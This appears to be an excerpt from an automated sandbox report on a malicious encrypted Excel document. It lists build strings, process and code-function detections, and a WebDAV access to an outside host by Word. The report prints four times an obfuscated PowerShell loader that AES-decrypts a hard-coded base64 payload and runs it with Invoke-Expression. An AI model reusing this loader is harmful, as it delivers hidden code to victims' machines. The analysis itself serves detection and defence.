            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\dnlib-fuscator-master win7\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: ~DFE4D87C1F83611F19.TMP.0.drInitial sample: OLE indicators vbamacros = False
            Source: AWD 490104998518.xlsInitial sample: OLE indicators encrypted = True

            Data Obfuscation

            barindex
            Obfuscated command line found
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
            Suspicious powershell command line found
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041CB50
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_0066C38C pushad ; ret 8_2_0066C38D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_01B721D8 push ebx; iretd 10_2_01B721EA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_01B71BED push eax; retf 10_2_01B71C01
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_01B70ABD push ebx; retf 10_2_01B70ACA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00457106 push ecx; ret 12_2_00457119
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0045B11A push esp; ret 12_2_0045B141
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0045E54D push esi; ret 12_2_0045E556
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00457A28 push eax; ret 12_2_00457A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00434E56 push ecx; ret 12_2_00434E69

            Persistence and Installation Behavior

            barindex
            Microsoft Office launches external ms-search protocol handler (WebDAV)
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\tny.wtf\DavWWWRootJump to behavior
